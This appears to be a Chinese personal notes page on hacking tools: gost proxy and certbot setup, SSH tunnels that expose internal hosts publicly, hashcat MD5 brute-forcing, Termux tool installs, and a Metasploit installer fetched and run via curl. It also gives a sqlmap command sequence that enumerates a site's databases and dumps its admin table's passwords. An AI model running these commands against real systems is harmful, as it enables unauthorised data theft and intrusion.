渗透技术
termux hack工具集 | hack - ip tracer
sqlmap简介及其它工具链 | Sqlmap使用详解 | Install Metasploit Framework on Ubuntu 20.04
破密工具 | HashCat | 密码爆破神器Hashcat | Hashcat Wordlist | xray download | xray Web 扫描
使用Certbot申请和使用Let's Encrypt的SSL证书
gost
convert socks5 to http proxy gost -L=http://:8080 -F=socks5://proxy.domain.name:1080
安装SSL证书 #sudo yum install certbot #sudo systemctl stop nginx sudo certbot certonly --standalone -d viiv.cc -d www.viiv.cc #certification dir /etc/letsencrypt/live/ #自动更新证书 #crontab -e 0 0 1 * * /usr/bin/certbot renew --force-renewal 5 0 1 * * /usr/bin/docker restart gost #wget https://github.com/ginuerzh/gost/releases/download/v2.11.5/gost-linux-amd64-2.11.5.gz #curl -v "https://www.google.com" --proxy "https://viiv.cc" --proxy-user "usename:passwd" systemctl stop httpd systemctl start nginx #server setting #vim cmd.sh DOMAIN="viiv.cc" USER="username" PASS="passwd*" PORT=443 AUTH=$(echo -n ${USER}:${PASS} | base64) BIND_IP=0.0.0.0 CERT_DIR=/etc/letsencrypt CERT=${CERT_DIR}/live/${DOMAIN}/fullchain.pem KEY=${CERT_DIR}/live/${DOMAIN}/privkey.pem sudo docker run -d --name gost \ -v ${CERT_DIR}:${CERT_DIR}:ro \ --net=host ginuerzh/gost \ -L "http2://${BIND_IP}:${PORT}?auth=${AUTH}&cert=${CERT}&key=${KEY}&probe_resist=web:yzlxxx.com/index.html&knock=www.google.com" #tunnel setting #curl -v "https://www.google.com" --proxy "https://viiv.cc" --proxy-user “username:passwd*” #gost -L ss://aes-256-cfb:080808@:1935 -F https://username:passwd*@viiv.cc:443 nohup gost -L ss://aes-256-cfb:080808@:3389 -F https://username:passwd*@viiv.cc:443 &
ssh tunnels命令
ssh服务器 配置文件/etc/ssh/sshd_config #默认0,不发送 ClientAliveInterval 60 ClientAliveCountMax 60 #端口转发 GatewayPorts yes #保持连接 TCPKeepAlive yes #指定参数 ssh -L 8080:localhost:33062 harttle@mysql.example.com -o TCPKeepAlive=true ServerAliveInterval=60 ssh客户端 配置文件~/.ssh/config Host * ControlPersist yes ControlMaster auto ControlPath /tmp/sshcontrol-%C ControlPersist 1d # 以上四条配合使用,实现多条ssh连接共享,而且保持1天内ssh存在。再次执行ssh命令几乎秒连 TCPKeepAlive=yes # 发送空TCP包来保持连接,但是可能被防火墙过滤 ServerAliveInterval 30 # 表示每隔多少秒(30秒),从客户端向服务器发送一次心跳(alive检测) # 心跳具体格式: debug1: client_input_global_request: rtype keepalive@openssh.com want_reply 1 ServerAliveCountMax 240 # 表示服务端多少次(240次)心跳无响应后, 客户端才会认为与服务器到SSH链接已经断开,然后断开连接。 Port 443 Host * ForwardAgent yes # 可以讓本地的 SSH Key 在遠端 Server 上進行轉送,也就是经过跳板机Server1,使用本地key访问Server2,不用把key传到Server1上导致泄露 # 虽然Server1不会获得key,但是可以使用key。所以该选项不宜用于Host *,应该只添加您信任的服务器以及打算用于代理转发的服务器。 # 注意跳板机需要设置允许代理转发, /etc/ssh/sshd_config 将AllowAgentForwarding的值设置为yes, 并重启服务 AddKeysToAgent yes ForwardX11 yes ForwardX11Trusted yes Compression yes # 压缩,加快数据传输速度 服务器端如何将端口绑定到外部地址上 我们可以把这个映射的端口绑定在0.0.0.0的接口上,方法是加上参数-b 0.0.0.0。 同时修改SSH服务器端 /etc/sshd_config中 GatewayPorts no为 GatewayPorts yes来打开它。 -------------------------------------------- -L: 本地转发 -D: 动态转发 -R: 远程转发 -f: ssh连接后台运行 -N: 不登录ssh shell 动态转发 ssh -N -D 1088 artink 二级转发 ssh -fN -D 1086 aw0331 ssh -L 1082:localhost:1086 artink 远程转发(curl www.yzl.com:8080访问内网WEBi server) ssh -N -R 8080:localhost:80 www.yzl.com 同时映射多个端口 ssh -L 8888:www.host.com:80 -L 110:mail.host.com:110 -L 25:mail.host.com:25 user@host -fN 本地访问外网,配置~/.ssh/config: Host artink User jerry HostName 147.112.110.229 LocalForward 1080 www.example.com:80 运行: ssh -N artink 相当于: ssh -N -L 1080:www.example.com:80 artink 本地访问外网: curl http://localhost:1080 远程转发外网访问内网,配置~/.ssh/config Host artink User jerry HostName 147.112.110.229 RemoteForward 1080 localhost:80 运行: ssh -N artink 相当于: ssh -N -R 1080:localhost:80 artink 当前用户访问跳板机artink的web server: ssh -L 1088:localhost:1080 artink curl http://artinkIP:1088 SSL VPN穿透(不需要运行VPN) 内网主机: ssh -fN -R 9022:localhost:9022 art01 穿透主机art01: ssh -p 9022 localhost 公网穿透 内网主机: ssh -fN -R *.9022:localhost:9022 art01 穿透主机art01: ssh -p 9022 localhost 另一台内网主机(第一台内网主机用户名和密码) ssh -p 9022 artHW -l root
termux hack工具集 | Tool-X - hack tools
使用termux搭建Nmap、Sqlmap、BBScan、subDomainsBrute、Hydra、RouterSploit等 实现支持端口扫描、注入检测、子域名爆破、多协议弱口令爆破、路由器漏洞检测框架多种功能手机渗透神器。 #Termux 官方移除了如下黑客工具的包支持: #Hydra #Metasploit #Sqlmap pip install sqlmap #Hashcat pkg install proot-distro proot-distro login ubuntu pkg update pkg install hashcat pkg install sqlmap pkg install hydra #hashcat测试 echo -n 23323323 |openssl md5 hashcat -a 3 -m 0 --force '5a745e31dbbd93f4c86d1ef82281688b' '?d?d?d?d?d?d?d?d' -O echo -n PassWord |openssl md5 hashcat -a 3 -m 0 -1 '?l?u' --force 'a9d402bfcde5792a8b531b3a82669585' '?1?1?1?1?1?1?1?1' -O #sqlmap测试 检查注入点: sqlmap -u http://aa.com/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs 爆当前数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db 指定库名列出所有表 sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 --tables 'vhost48330' 为指定数据库名称 指定库名表名列出所有字段 sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns 'admin' 为指定表名称 指定库名表名字段dump出指定字段 sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump 'ac,id,password' 为指定字段名称 #安装metasploit on ubuntu apt update curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall msfconsole db_status msfdb init
termux hacker tools | metasploit
Could not find rake-13.0.3 in any of the sources Run `bundle install` to install missing gems. Could not load OpenSSL. You must recompile Ruby with OpenSSL support or change the sources in your Gemfile from 'https' to 'http'. Instructions for compiling with OpenSSL using RVM are available at https://rvm.io/packages/openssl.